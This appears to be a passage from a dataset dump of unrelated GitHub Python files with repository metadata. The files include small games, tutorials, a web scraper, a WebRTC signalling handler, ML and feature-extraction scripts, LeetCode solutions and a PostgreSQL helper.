port=8080)\r\n","repo_name":"anmironova/pomnikorni","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25115272972","text":"# Allow for type hinting while preventing circular imports\nfrom __future__ import annotations\nfrom typing import TYPE_CHECKING\n\n# Import standard modules\nimport math\nfrom math import pi as PI\n\n# Import non-standard modules\nimport pygame as pg\nfrom pygame.sprite import Sprite\n\n# Import local classes and methods\nimport helper_functions as hf\n\n# Import local class and methods that are only used for type hinting\nif TYPE_CHECKING:\n from settings import Settings\n\n\nclass Bird(Sprite):\n \"\"\"A class for the bird\"\"\"\n\n def __init__(self, screen: pg.Surface, settings: Settings):\n \"\"\"Initialize the bird's settings\"\"\"\n\n super(Bird, self).__init__()\n self.screen = screen\n self.screen_rect = self.screen.get_rect()\n\n # Physics parameters\n self.accel = settings.gravity\n self.max_velocity = settings.max_velocity\n self.jump_velocity = settings.jump_velocity\n\n # Image\n self.color = 0 # 0 = Yellow, 1 = Red, 2 = Blue\n self.frames = settings.bird_frames\n self.image_orig = self.frames[self.color][0]\n self.image = self.image_orig.copy()\n self.mask = pg.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\n self.animation_speed = 75\n self.idle_period = 3000\n self.idle_amp = 50\n self.y_0 = self.screen_rect.centery\n\n # Sound effects\n self.sfx_flap = settings.sfx_flap\n self.sfx_hit = settings.sfx_hit\n self.sfx_fall = settings.sfx_fall\n self.sfx_pop = settings.sfx_pop\n\n self.init_dynamic_variables()\n\n def init_dynamic_variables(self):\n \"\"\"Initializes the birds's dynamic variables\"\"\"\n\n # Positioning\n self.x = 150\n self.y = self.y_0\n self.rect.center = (self.x, self.y)\n self.velocity = 0\n self.angle = 0\n self.prev_jump_elev = 0\n self.current_frame = 0\n self.animation_time = 0\n self.idle_time = 0\n\n def flap(self):\n \"\"\"Jump the bird\"\"\"\n\n # Update the bird's velocity\n self.velocity = -self.jump_velocity\n self.prev_jump_elev = self.y\n self.sfx_flap.play()\n\n def change_color(self):\n \"\"\"Changes the color of the bird by updating the reference to a new spritesheet and plays the sound effect\"\"\"\n \n self.color = (self.color + 1) % len(self.frames)\n self.sfx_pop.stop()\n self.sfx_pop.play()\n\n def update(self, dt: int, 
settings: Settings):\n \"\"\"Update the bird's animation and location\"\"\"\n\n # Update the animation\n if settings.current_state != 'GAMEOVER':\n self.animation_time += dt\n if self.animation_time > self.animation_speed:\n self.animation_time = 0\n self.current_frame = (self.current_frame + 1) % len(self.frames[0])\n self.image_orig = self.frames[self.color][self.current_frame]\n\n # At beginning of game, bird animates smoothly up and down\n if settings.current_state in ['SPLASH', 'READY']:\n self.idle_time = (self.idle_time + dt) % self.idle_period\n theta = self.idle_time / self.idle_period * 2 * PI\n self.y = self.y_0 + self.idle_amp * math.sin(theta)\n self.angle = -45 * math.cos(theta)\n\n # During PLAY state, bird is affected by gravity and rotates based on flaps\n elif settings.current_state in ['PLAY', 'GAMEOVER']:\n\n # Update the bird's velocity and position\n if self.y < settings.ground_elev:\n new_velocity = self.velocity + self.accel * dt\n self.velocity = hf.clamp(new_velocity, -self.max_velocity, self.max_velocity)\n self.y += self.velocity * dt\n\n # Rotate the bird based on previous jump elevation\n self.angle = hf.translate(self.y, self.prev_jump_elev, self.prev_jump_elev + 150, 20, -90)\n\n # Update the rect\n self.image = pg.transform.rotate(self.image_orig, self.angle)\n self.rect = self.image.get_rect()\n self.rect.center = self.x, self.y\n self.mask = pg.mask.from_surface(self.image)\n\n def blitme(self):\n \"\"\"Draw the bird at its current location\"\"\"\n \n self.screen.blit(self.image, self.rect)\n","repo_name":"djsereno/Flappy-Bird","sub_path":"flappybird/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40681280766","text":"# counter=1\n# movie_list=['Die Hard', 'Terminator', 'Batman', 'Superman']\n# for values in movie_list:\n# print(counter, '>' + values)\n# counter +=1\n#\n#\n# # Don't know how to number\n# counter=1\n# places_list=['Spain', 'Italy', 'France', 'Luxemburg']\n# for values in places_list:\n# print(counter, '>' + values)\n# counter +=1\n\n\n\n\nmovies = {\n 'Die Hard':'USA',\n 'Lord of the rings':'New Zealand',\n 'Terminator':'Australia',\n 'Batman': 'New York',\n 'Superman':'Washington'\n}\n\nprint(movies['Die Hard'])\ncounter=1\nfor movie_key in movies:\n print('This is the movie:', counter, movie_key, movies[movie_key])\n counter +=1\n\n\n#Don't know how to number\n\n\n\n\n# Create a game that runs until a magic number is found(while+if+break)\n# guess=int(input('Enter a number'))\n\n# while (guess==7):\n# print('You found the magic number')\n# if guess>7:\n# print('Number is too big')\n# if guess<7:\n# print('Number is too small')\n# else:\n# ('Type in a number')\n#\n# #Check if number is prime\n# # number = int(input(\"Enter any number: \"))\n#\n# # prime number is always greater than 1\n# if number > 1:\n# for i in range(2, number):\n# if (number % i) == 0:\n# print(number, \"is not a prime number\")\n# break\n# else:\n# print(number, \"is a prime number\")\n#\n# # if the entered number is less than or equal to 1\n# # then it is not prime number\n# else:\n# print(number, \"is not a prime number\")\n\n\n#Program to count the number of individual characters in a string\n#\n# count=input(\"Enter a string\")\n# print(len(count))\n","repo_name":"Mguysin/Python_files","sub_path":"Week 2/w2d3 Tasks (Loops).py","file_name":"w2d3 Tasks 
(Loops).py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30502829178","text":"# -*- coding: utf-8 -*-\n# vim:set et tabstop=4 shiftwidth=4 nu nowrap fileencoding=utf-8:\n\nimport rtc\nimport sdp\nimport logging as log\n\nfrom tornado.websocket import WebSocketHandler\n\n\n__all__ = ['SignallingChannelHandler']\n\n\nSTATE_UNKNOWN = 0x00\nSTATE_START = 0x01\nSTATE_SDP_DESCR = 0x02\nSTATE_SDP_CANDIDATE = 0x03\nSTATE_DONE = 0x04\nSTATE_ERROR = 0xfe\nSTATE_CLOSED = 0xff\n\n\nclass SignallingChannelHandler(WebSocketHandler):\n \"\"\"\n UDP dynamic port range: 49152-65535\n \"\"\"\n \n state = STATE_START\n \n remote_sdescr = None\n \n local_sdescr = None\n \n def open(self):\n self.state = STATE_SDP_DESCR\n log.info('Signalling channle was opened.')\n \n def on_message(self, message):\n log.info('Message has been received on signalling channel:\\r\\n{0}.'.format(message))\n if self.state == STATE_SDP_DESCR :\n self.on_session_description(message)\n elif self.state == STATE_SDP_CANDIDATE :\n self.on_candidate(message)\n else :\n log.warn('Unsupported state {0}. Signalling message will be ignored.'.format(self.state))\n \n def on_session_description(self, msg):\n \"\"\"\n Method determines which media available streams and\n sends session description back to web-application.\n \n @type msg: C{str}\n @param msg: Session description. it should be utf-8 encoded string\n \"\"\"\n self.state = STATE_SDP_CANDIDATE\n self.remote_sdescr = rtc.SessionDescription(rtc.SdpType.offer, unicode(msg))\n self.local_sdescr = rtc.SessionDescription(rtc.SdpType.answer, self.remote_sdescr.sdp)\n self.write_message(self.local_sdescr.to_json().encode('utf-8'))\n \n def on_candidate(self, msg) :\n \"\"\"\n This method selects most approprivate candidate.\n\n @type msg: C{str}\n @param msg: SDP candidate, utf-8 encoded string\n \"\"\"\n self.state = STATE_SDP_CANDIDATE\n ice_candidate = rtc.IceCandidate.create_from_string(unicode(msg))\n log.info('ice_candidate: {0}'.format(ice_candidate))\n self.write_message(msg)\n \n def on_close(self):\n log.info('Signalling channel has been closed.')\n\n","repo_name":"zolkko/ubot","sub_path":"roboserv/roboserv/signallingchannel.py","file_name":"signallingchannel.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38035488233","text":"import re\r\nfrom bs4 import BeautifulSoup\r\nfrom requests import get\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nclass Scrapper:\r\n\r\n def __init__(self, url, file_format, output, urls_dictionary):\r\n # self.url = url\r\n self.url = url[:-1] if url[-1] == '/' else url\r\n self.file_format = file_format\r\n self.output = output\r\n self.urls_dictionary = urls_dictionary\r\n\r\n def start_crawl(self):\r\n try:\r\n page = get(self.url)\r\n except Exception:\r\n self.update_main_link('error', 'error', 'error')\r\n return self.urls_dictionary\r\n bs = BeautifulSoup(page.content, 'html.parser')\r\n if bs.find(\"title\") is not None:\r\n page_title = bs.find(\"title\").get_text()\r\n else:\r\n page_title = ''\r\n external_links_counter = 0\r\n internal_links_counter = 0\r\n external_links_condition = \"^http.*\"\r\n for link in self.get_uniqe_links(bs):\r\n if re.match(external_links_condition, link):\r\n external_links_counter += 1\r\n else:\r\n internal_links_counter += 1\r\n self.update_reference_counter(self.url + link)\r\n 
self.update_main_link(external_links_counter, internal_links_counter, page_title)\r\n return self.urls_dictionary\r\n\r\n def update_main_link(self, external_links_counter, internal_links_counter, page_title):\r\n main_url = self.url + \"/\" if (self.url + \"/\") in self.urls_dictionary.keys() else self.url\r\n ref_counter = 0 if main_url not in self.urls_dictionary.keys() else self.urls_dictionary[main_url][\r\n 'reference count']\r\n self.urls_dictionary[main_url] = self.create_row(main_url, page_title, internal_links_counter,\r\n external_links_counter, ref_counter)\r\n\r\n def update_reference_counter(self, link):\r\n if link in self.urls_dictionary.keys():\r\n self.urls_dictionary[link]['reference count'] += 1\r\n else:\r\n self.urls_dictionary[link] = self.create_row(link, '', -1, -1, 1)\r\n\r\n def read_file(self):\r\n if os.path.isfile(self.output):\r\n if self.file_format == 'CSV':\r\n return pd.read_csv(self.output)\r\n if self.file_format == 'JSON':\r\n return pd.read_json(self.output)\r\n else:\r\n return pd.DataFrame(\r\n columns=['url', 'title', 'internal links count', 'external links count', 'reference count'],\r\n index=[0])\r\n\r\n def create_dictionary_from_dataframe(self, data_frame):\r\n dictionary = {}\r\n for index, row in data_frame.iterrows():\r\n dictionary[row['url']] = {'url': row['url'], 'title': row['title'],\r\n 'internal links count': row['internal links count'],\r\n 'external links count': row['external links count'],\r\n 'reference count': row['reference count']}\r\n return dictionary\r\n\r\n def create_row(self, link, page_title, internal_links_counter, external_links_counter, reference_count):\r\n d = {'url': link, 'title': page_title,\r\n 'internal links count': internal_links_counter,\r\n 'external links count': external_links_counter,\r\n 'reference count': reference_count}\r\n return d\r\n\r\n def get_uniqe_links(self, bs):\r\n\r\n unique_links = set()\r\n for link in bs.find_all('a'):\r\n link = link.get('href')\r\n if link is not None and len(link) > 1 and \"?\" not in link and '/..' 
not in link:\r\n link = link[:-1] if link[-1] == '/' and link[-2] != '/' else link\r\n unique_links.add(link)\r\n return unique_links\r\n","repo_name":"Krzystoss/Web_crawler","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11282881398","text":"import pygame, sys\nfrom pygame.locals import *\nfrom game.imageimporter import importimage as load\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n self.sprite = []\n self.sprite.append(load('assets/character/front.png'))\n self.sprite.append(load('assets/character/back.png'))\n self.sprite.append(load('assets/character/left.png'))\n self.sprite.append(load('assets/character/right.png'))\n self.current_sprite = 0\n self.image = self.sprite[self.current_sprite]\n\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.rect = self.image.get_rect()\n self.rect.topleft = [pos_x, pos_y]\n\n def update_view(self, dr):\n self.current_sprite = dr\n self.image = self.sprite[self.current_sprite]\n\n def move_right(self, step):\n self.pos_x += step\n self.rect.topleft = [self.pos_x, self.pos_y]\n\n def move_left(self, step):\n self.pos_x -= step\n self.rect.topleft = [self.pos_x, self.pos_y]\n\n def move_up(self, step):\n self.pos_y -= step\n self.rect.topleft = [self.pos_x, self.pos_y]\n\n def move_down(self, step):\n self.pos_y += step\n self.rect.topleft = [self.pos_x, self.pos_y]","repo_name":"JonasBernard/game-off-2022","sub_path":"player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8101170920","text":"#importing the libaries\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n#loading the dataset\r\ndataset = pd.read_csv('6. 
Decision Tree Classification\\Social_Network_Ads.csv')\r\nX = dataset.iloc[:,:-1].values\r\ny = dataset.iloc[:,-1].values\r\n\r\n#Spliting of the data into training and testing dataset\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25,random_state=4)\r\nprint(X_train)\r\nprint(X_test)\r\n\r\n#Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\nprint(X_train)\r\nprint(X_test)\r\n\r\n#Making Decision Tree Clasifier \r\nfrom sklearn.tree import DecisionTreeClassifier\r\nclf = DecisionTreeClassifier(criterion='entropy',random_state=1)\r\nclf.fit(X_train, y_train)\r\n\r\n#Predicting the new value\r\nprint(clf.predict(sc.transform([[30,87000]])))\r\n\r\n#Predicting the testing dataset\r\ny_pred = clf.predict(X_test)\r\n\r\n#Finding the accuracy\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\ncm = confusion_matrix(y_test, y_pred)\r\nprint(cm)\r\nacc = accuracy_score(y_test, y_pred)\r\nprint(acc)\r\n\r\n#Visualising the training set\r\nfrom matplotlib.colors import ListedColormap\r\nX_set, y_set = sc.inverse_transform(X_train), y_train\r\nX1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 10, stop = X_set[:, 0].max() + 10, step = 0.25),\r\n np.arange(start = X_set[:, 1].min() - 1000, stop = X_set[:, 1].max() + 1000, step = 0.25))\r\nplt.contourf(X1, X2, clf.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),\r\n alpha = 0.75, cmap = ListedColormap(('red', 'green')))\r\nplt.xlim(X1.min(), X1.max())\r\nplt.ylim(X2.min(), X2.max())\r\nfor i, j in enumerate(np.unique(y_set)):\r\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c = ListedColormap(('red', 'green'))(i), label = j)\r\nplt.title('Decision Tree Classification (Training set)')\r\nplt.xlabel('Age')\r\nplt.ylabel('Estimated Salary')\r\nplt.legend()\r\nplt.show()\r\n\r\n#Visualising the testing set\r\nfrom matplotlib.colors import ListedColormap\r\nX_set, y_set = sc.inverse_transform(X_test), y_test\r\nX1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 10, stop = X_set[:, 0].max() + 10, step = 0.25),\r\n np.arange(start = X_set[:, 1].min() - 1000, stop = X_set[:, 1].max() + 1000, step = 0.25))\r\nplt.contourf(X1, X2, clf.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),\r\n alpha = 0.75, cmap = ListedColormap(('red', 'green')))\r\nplt.xlim(X1.min(), X1.max())\r\nplt.ylim(X2.min(), X2.max())\r\nfor i, j in enumerate(np.unique(y_set)):\r\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c = ListedColormap(('red', 'green'))(i), label = j)\r\nplt.title('Decision Tree Classification (Test set)')\r\nplt.xlabel('Age')\r\nplt.ylabel('Estimated Salary')\r\nplt.legend()\r\nplt.show()","repo_name":"Anish0494/Data-Science-and-Ml-algorithm-using-Python","sub_path":"Part__3__CLassification/6. 
Decision Tree Classification/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35423229371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy\n\n\ndef get_close_points(tolerane: float, y0: numpy.ndarray, y1: numpy.ndarray, x: numpy.ndarray = None):\n idx = numpy.argwhere(numpy.abs(y0 - y1) < tolerane)\n\n if x is not None:\n return x[idx], y0[idx]\n\n return y0[idx]\n\n\ndef get_intersection_(y0: numpy.ndarray, y1: numpy.ndarray, x: numpy.ndarray = None):\n idx = numpy.argwhere(numpy.diff(numpy.sign(y0 - y1))).flatten()\n\n if x is not None:\n return x[idx], y0[idx]\n\n return y0[idx]\n\n\ndef get_intersection(y0: numpy.ndarray, y1: numpy.ndarray, x: numpy.ndarray, average: bool = True):\n\n idx = numpy.argwhere(numpy.diff(numpy.sign(y0 - y1))).flatten()\n\n if not average:\n return y0[idx]\n\n else:\n x_mean = (x[idx + 1] + x[idx]) / 2\n y_mean = (y0[idx + 1] + y0[idx]) / 2\n\n return x_mean, y_mean\n\n\ndef test_valid_input(user_input, valid_inputs: list, variable_name: str = ''):\n if user_input not in valid_inputs:\n raise ValueError(f\"[{variable_name}] user_input: {user_input} argument not valid. Valid choices are: {valid_inputs}\")\n\n\n# -\n","repo_name":"MartinPdeS/SuPyMode","sub_path":"SuPyMode/tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"32213413767","text":"from django.template import library\nfrom django.utils.safestring import mark_safe\n\nfrom ..menu import Menu\n\nregister = library.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef paper_menu(context):\n request = context.get(\"request\")\n menu = Menu(request)\n menu.build_tree()\n menu.resolve_tree(request)\n menu.activate_tree(request)\n return mark_safe(menu.render(request))\n\n\n@register.simple_tag(takes_context=True)\ndef paper_menu_item(context, item):\n request = context.get(\"request\")\n return mark_safe(item.render(request))\n","repo_name":"dldevinc/paper-admin","sub_path":"paper_admin/templatetags/paper_menu.py","file_name":"paper_menu.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"9450410359","text":"'''\nDifficulty: Medium\n\nGiven a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.\n\nExample 1:\n\nInput: [5,7]\nOutput: 4\n\nExample 2:\n\nInput: [0,1]\nOutput: 0\n'''\nimport math\nimport time\n\n\nclass Solution:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n # This one should be closer to O(n/2**n) on average, but O(n) worst case\n if not m or not n or m == 0:\n return 0\n mexp = int(math.log(m, 2))\n nexp = int(math.log(n, 2))\n if mexp != nexp:\n return 0\n else:\n returnval = m\n for x in range(returnval, n + 1):\n returnval &= x\n return returnval\n\n def rangeBitwiseAnds(self, m: int, n: int) -> int:\n # Premium solution, hella efficient, I think O(log n)\n while m < n:\n print(n)\n n = n & (n - 1)\n return m & n\n\n def rangeBitwiseAndn(self, m: int, n: int) -> int:\n # Naive O(n) solution\n returnval = m\n if m != 0:\n for x in range(m, n + 1):\n returnval &= x\n return returnval\n\n\nm = int(math.pow(2, 30))\nn = 2147483647\nstart = time.time()\n#print(Solution.rangeBitwiseAnd(\"\", m, 
n))\nprint(time.time() - start)\n\nstart = time.time()\nprint(Solution.rangeBitwiseAnds(\"\", m, n))\nprint(time.time() - start)\n\nstart = time.time()\n#print(Solution.rangeBitwiseAndn(\"\", m, n))\nprint(time.time() - start)\n","repo_name":"driscoll42/leetcode","sub_path":"0201-Bitwise_AND_of_Numbers_Range.py","file_name":"0201-Bitwise_AND_of_Numbers_Range.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73942319285","text":"#python program to check a number is perfect number\na=int(input(\"Enter a number\"))\ns=0\nif True:\n if isinstance(a,int) and a>0:\n for i in range(1,a):\n if a%i==0:s+=i\n if s==a:\n print(\"Perfect Number\")\n else:\n print(\"Not perfect number\")\nelse: \n print(\"Numbers only accepted\")\n\n# In number theory, a perfect number is a positive integer that is equal to the sum of its positive divisors, excluding the number itself.","repo_name":"SarjakNEPAL/College","sub_path":"Semester 1/Programming and algorithms/Loop/PracticeQuestion/qno43.py","file_name":"qno43.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27711467432","text":"# using keywords arguments improves readability\ntwitter_search('@obama', False, 20, True)\ntwitter_search('@obama', retweets=False, numtweets=20, popular=True)\n\n\n\n# printing tuple is better when using namedtuple()\n# because it gives you the keywords\ndoctest.testmod() \n# (0, 4)\ndoctest.testmod()\n# TestResults(failed=0, attempted=4)\nTestRestuls = namedtuple('TestResults', ['failed', 'attempted'])\n\n\n\n# this is what is done in other languages\np = 'Raymond', 'Hettinger', 0x30, 'python@example.com'\nfname = p[0]\nlname = p[1]\nage = p[2]\nemail = p[3]\n# in python, use unpacking\nfname, lname, age, email = p\n\n\n# update multiple state variables\n# in other languages we need to use temporary variables\ndef fibonacci(n):\n x = 0\n y = 1\n for i in range(n):\n print(x)\n t = y\n y = x + y\n x = t\n# in python this is better and faster\ndef fibonacci(n):\n x, y = 0, 1\n for i in range(n):\n print(x)\n x, y = y, x + y\n\n\n# simultaneous state updates\n# don't use tmp variables\ntmp_x = x + dx * t\ntmp_y = y + dy * t\ntmp_dx = influence(m, x, y, dx, dy, partial='x')\ntmp_dy = influence(m, x, y, dx, dy, partial='y')\nx = tmp_x\ny = tmp_y\ndx = tmp_dx\ndx = tmp_dy\n# use this\nx, y, dx, dy = (x + dx * t,\n y + dy * t,\n influence(m, x, y, dx, dy, partial='x'),\n influence(m, x, y, dx, dy, partial='y'))\n\n\n\n\n","repo_name":"brccabral/PythonTips","sub_path":"004_index_number_name.py","file_name":"004_index_number_name.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22501698697","text":"import numpy as np\nimport pandas as pd\nimport warnings\n\nfrom scipy.stats import multivariate_normal as mvn\nfrom scipy.optimize import fsolve\nfrom typing import Tuple\n\nclass TypeIIIBiasSampler():\n def __init__(\n self,\n label_col: str,\n protected_attribute: str,\n recall_first_group: float,\n recall_second_group: float,\n fpr_first_group: float = 0.05,\n fpr_second_group: float = 0.05,\n protected_attribute_values: Tuple[str, str] = None,\n seed: int = 42,\n feature_names: Tuple[str, str] = (\"x1\", \"x2\"),\n ):\n self.label_col = label_col\n self.protected_attribute = protected_attribute\n self.recall_first_group = 
recall_first_group\n self.recall_second_group = recall_second_group\n self.fpr_first_group = fpr_first_group\n self.fpr_second_group = fpr_second_group\n self.pro_attr_values = protected_attribute_values\n self.seed = seed\n self.feature_names = feature_names\n self.mvn_neg, self.mvn_group_1, self.mvn_group_2 = (\n self._calculate_multivariate_normals()\n )\n\n def __call__(self, data: pd.DataFrame, inplace: bool = False) -> pd.DataFrame:\n if not inplace:\n data = data.copy()\n if not self.pro_attr_values:\n self.pro_attr_values = data[self.protected_attribute].unique()\n warnings.warn(\n f\"Protected attribute values order not passed. Using {self.pro_attr_values}.\",\n UserWarning,\n )\n\n # Add new columns to dataframe\n data[self.feature_names] = 1\n\n # Conditions for filtering dataframe.\n a_pos = ((data[self.protected_attribute] == self.pro_attr_values[0]) &\n (data[self.label_col] == 1))\n b_pos = ((data[self.protected_attribute] == self.pro_attr_values[1]) &\n (data[self.label_col] == 1))\n a_neg = ((data[self.protected_attribute] == self.pro_attr_values[0]) &\n (data[self.label_col] == 0))\n b_neg = ((data[self.protected_attribute] == self.pro_attr_values[1]) &\n (data[self.label_col] == 0))\n\n data.loc[a_pos, self.feature_names] = self.mvn_group_1.rvs(data[a_pos].shape[0])\n data.loc[b_pos, self.feature_names] = self.mvn_group_2.rvs(data[b_pos].shape[0])\n data.loc[a_neg, self.feature_names] = self.mvn_neg.rvs(data[a_neg].shape[0])\n data.loc[b_neg, self.feature_names] = self.mvn_neg.rvs(data[b_neg].shape[0])\n\n return data\n\n def _calculate_multivariate_normals(self) -> Tuple[mvn, mvn, mvn]:\n def get_mean(var: Tuple[float, float]) -> Tuple[float, float]:\n intercept, new_mean = var\n new_dist = mvn(mean=[new_mean, 0], cov=cov_matrix)\n\n obj_1 = 1 - mvn_negative.cdf([intercept, 0]) * 2 - fpr\n obj_2 = 1 - new_dist.cdf([intercept, 0]) * 2 - recall\n return obj_1, obj_2\n\n cov_matrix = [[1, 0], [0, 1]]\n mvn_negative = mvn(mean=[0, 0], cov=cov_matrix, seed=self.seed)\n\n fpr_list = [self.fpr_first_group, self.fpr_second_group]\n recall_list = [self.recall_first_group, self.recall_second_group]\n\n distributions = []\n for fpr, recall in zip(fpr_list, recall_list):\n estimate = [1.0, 1.0]\n _, mean = fsolve(get_mean, estimate)\n\n np.random.seed(self.seed)\n theta = 0.25 * np.pi\n rotation_matrix = np.array(\n [[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]\n )\n mean = np.array([mean, 0])\n rotated_mean = np.matmul(rotation_matrix, mean)\n distributions.append(mvn(mean=rotated_mean, cov=cov_matrix, seed=self.seed))\n\n return mvn_negative, distributions[0], distributions[1]\n \n","repo_name":"feedzai/bank-account-fraud","sub_path":"notebooks/mvn.py","file_name":"mvn.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"76"} +{"seq_id":"32640760555","text":"from cv2 import imread, xfeatures2d\nfrom pickle import dump\nfrom os import mkdir, path\nimport numpy as np\nimport time\nfrom statistics import median\n\nn_test = '4'\npath_dataset = './Base/'\npath_pickles = './Tests/Test' + n_test +'/pickles/SURF/'\ndtt = np.load(path_dataset + 'Data_Treino_Teste_'+ n_test +'.npy', allow_pickle=True).item()\n\ndef pickle_dump(filename, data):\n with open(filename, 'wb') as pd:\n dump(data, pd)\n pd.close()\n\ndef vetor_create(surf, x):\n a = []\n if (x == 'mean'):\n for j in range(surf.descriptorSize()):\n a.append(des.transpose()[j].mean())\n if (x == 'median'):\n for j in 
range(surf.descriptorSize()):\n a.append(median(des.transpose()[j]))\n print('✔')\n return a\n\n\nhessianThresholds = [200]\n#hessianThresholds = [100, 200, 300]\n#nOctavs = [4, 10, 20, 22, 23, 24]\nnOctavs = [22]\nclasses = ['2', '5', '10', '20', '50', '100']\nstages = ['Treino', 'Teste']\ncalculos = ['mean', 'median']\nfor calc in calculos:\n for ht in hessianThresholds:\n for no in nOctavs:\n description = []\n surf = xfeatures2d.SURF_create(hessianThreshold = ht, nOctaves = no, nOctaveLayers = no - 1)\n description.append('Descriptor_Size:{0}'.format(surf.descriptorSize()))\n description.append('HessianThreshold:{0}'.format(surf.getHessianThreshold()))\n description.append('NOctaveLayers:{0}'.format(surf.getNOctaveLayers()))\n description.append('NOctaves:{0}'.format(surf.getNOctaves()))\n description.append(calc)\n print(\"\\n\".join(description))\n path_save = path_pickles + 'SURF' + \"_\".join(description)\n if not (path.isdir(path_save)):\n mkdir(path_save)\n t0 = time.time()\n for stage in stages:\n x = []\n y = []\n for classe in classes:\n for file_path in dtt[classe][stage]:\n print('Caminho', file_path)\n img = imread(file_path, 0)\n kp, des = surf.detectAndCompute(img, None)\n print(len(kp))\n print(len(des))\n a = vetor_create(surf, calc)\n x.append(a)\n y.append(int(classe))\n dados = np.array(x)\n rotulos = np.array(y)\n print('Dados ' + stage, dados)\n print('Rótulos ' + stage, rotulos)\n index = np.random.permutation(len(rotulos))\n X, Y = dados[index], rotulos[index]\n pickle_dump(path_save + '/Data_'+ stage +'.pickle', X)\n pickle_dump(path_save + '/Label_'+ stage +'.pickle', Y)\n t1 = time.time()\n file = open(path_pickles + 'Description.txt', 'a')\n file.write('\\nSURF\\n' +\"\\n\".join(description) + '\\n')\n file.write('Tempo Total: {0}\\n'.format(t1 - t0))\n file.close()\n else:\n print('Skip ❌ ' + path_save)","repo_name":"oziellcarvallho/Reconhecimento_Cedulas_Real","sub_path":"ExtractSurf.py","file_name":"ExtractSurf.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3436463438","text":"\"\"\"\nDatabase Context Manager for PostgreSQL.\n\nrequires a config.yaml file.\nspecifying host, port user, password and dbname.\n\"\"\"\nimport yaml\nimport psycopg2\n\nclass Database(object):\n def __init__(self, config:str):\n super().__init__()\n # get host and port from config.yaml\n assert config.endswith('.yaml'), \"[DB] Configuration must be a yaml file.\"\n try:\n with open(config, 'r') as f:\n postgres = yaml.load(f, Loader=yaml.FullLoader)\n except FileNotFoundError as fe:\n print(\"[DB] Config file not found.\")\n except Exception as e:\n print(\"[DB] {}\".format(e))\n\n self.host = postgres['host']\n self.port = postgres['port']\n self.user = postgres['user']\n self.password = postgres['password']\n self.dbname = postgres['dbname']\n\n self.conn = None\n self.cursor = None\n \n # Context Manager magic methods\n def __enter__(self):\n \"\"\" Connects to database and return the cursor. \"\"\"\n self.conn = self._connect()\n self.cursor = self.conn.cursor()\n return self.cursor\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n \"\"\" Commit and closes connection to database. 
